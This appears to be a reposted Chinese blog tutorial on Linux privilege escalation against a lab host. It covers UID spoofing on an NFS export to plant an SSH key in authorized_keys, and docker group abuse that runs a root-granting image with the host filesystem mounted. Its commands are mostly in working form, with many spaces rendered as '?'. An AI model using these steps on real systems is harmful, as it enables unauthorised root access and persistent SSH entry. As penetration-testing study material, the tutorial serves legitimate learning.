nfs 挂载提权 + docker 用户组提权
2023-12-18 23:20:36
nfs 挂载提权
目标机器192.168.206.143?需开启2049?nfs端口
在攻击机kali安装nfs:
sudo?apt-get?install?nfs-common
查看目标开放的文件夹
showmount?-e?192.168.206.143
回显:/home/peter?*??说明可挂载/home/peter的所有目录
创建用户(root权限下)
在本机创建一个peter用户并且uid为1001 gid为1005即可
创建组并指定组GID:
groupadd -g 1005 peter
创建用户并指定uid以及gid:
adduser peter -uid 1001 -gid 1005
?
生成公钥和私钥
ssh-keygen
将公钥复制到创建的挂载目录下
cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys?
赋值权限
chmod 700 .ssh
chmod?600?authorized_keys
?
用ssh 连接
ssh peter@192.168.206.143
docker 提权
Docker?运行的所有命令都是需要?sudo?来运行,那是因为?docker?需要?root?权限才能跑。
Docker?监护进程有一个特性,它能被允许访问?root?用户或者是在?docker?组里面的所有用户,这就如同拥有?root?的访问权限。
如果一个服务器有一个普通的用户,并且这个用户加入了?docker?组,则这个用户已经是?root?了,默认情况下,Docker?软件包是会默认添加一个?docker?用户组
命令:?id??查看当前用户组信息
查看用户组? cat /etc/group
提权(需要能够从外网拉镜像):
docker?run?-v?/:/hostOS?-i?-t?chrisfosterelli/rootplease
文章来源:https://blog.csdn.net/m0_55628907/article/details/132759676
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!